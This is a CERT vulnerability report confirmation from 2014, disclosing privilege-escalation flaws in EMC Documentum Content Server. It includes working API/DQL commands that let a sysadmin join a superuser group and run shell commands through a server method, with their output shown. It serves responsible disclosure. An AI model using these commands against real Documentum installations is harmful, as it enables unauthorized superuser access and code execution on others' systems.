Vulnerability Report Confirmation - [VRF#HUDHKNW4] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUDHKNW4. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org . Please reference this Report Tracking ID: VRF#HUDHKNW4. Do not use the back button to submit another report. Click here instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address andrew@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: ESA-2012-009 was not properly analyzed and fixed. According to ESA-2012-009 user with sysadmin privilege should not able to elevate his privileges, nevertheless documentation does not describe some sysadmin capabilities that leads to privilege elevation: 1. Sysadmin is not able to modify dm_superusers_dynamic and dm_superusers system groups (dm_superusers membership grants superuser privileges), but he is able to modify groups that belongs to dm_superusers system group (Content Server by default creates dcs_privileged_users group which belongs to dm_superusers system group, and sysadmin is able to modify dcs_privileged_users group and, so, gain superuser privileges): API> ?,c,alter group dm_superusers add testadmin [DM_QUERY_E_BAD_GROUP_SAVE]error: "CREATE or ALTER GROUP: Unable to save the group." [DM_GROUP_E_NEED_SUPER_USER_PRIV]error: "The current user (testadmin) needs to have superuser privilege to save the group object." API> ?,c,alter group dm_superusers_dynamic add testadmin [DM_QUERY_E_BAD_GROUP_SAVE]error: "CREATE or ALTER GROUP: Unable to save the group." [DM_GROUP_E_NEED_SUPER_USER_PRIV]error: "The current user (testadmin) needs to have superuser privilege to save the group object." API> ?,c,select groups_names from dm_group where group_name='dm_superusers' groups_names ----------------------- dcs_privileged_users dm_superusers_dynamic (2 rows affected) API> ?,c,update dm_group object set is_dynamic=FALSE where group_name='dcs_privileged_users' objects_updated --------------- 1 (1 row affected) [DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." API> ?,c,alter group dcs_privileged_users add testadmin OK 2. sysadmin is able to perform dump and load operations, so he is able to create malicious superusers through load operation 3. sysadmin is able to create dm_method objects, so he is able to execute any code on Content Server and thereby elevate privileges: API> ?,c,create dm_method object set object_name='test method', set method_verb='echo test_method > /tmp/test', set method_type='programm', set run_as_server=TRUE object_created ---------------- 1001ffd7800f07bc (1 row affected) API> ?,c,execute do_method with method='test method' .... (1 row affected) Bye ~ ]$ cat /tmp/test test_method ~ ]$ 4. sysadmin is able to create/modify dm_client_rights objects, these objects store information about capabilities of remote clients, like ability to perform trusted authentication and use dynamic groups, so by creating/modifying dm_client_rights objects sysadmin is able to elvate privileges 5. sysadmin is able to create/modify dmc_module objects, these objects "contains" java code, that is executed on java-clients, Documentum Java Method Server for example, so sysadmin is able to execute any code on Documentum Java Method Server and thereby elevate privileges Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? No Vulnerability Impact The same as ESA-2012-009 Comments Attached File Date 2014-04-23T23:23:57 Report Tracking ID VRF#HUDHKNW4 CERT Tracking IDs ------------------------------------------------------------------------ Carnegie Mellon University ©2014 Carnegie Mellon University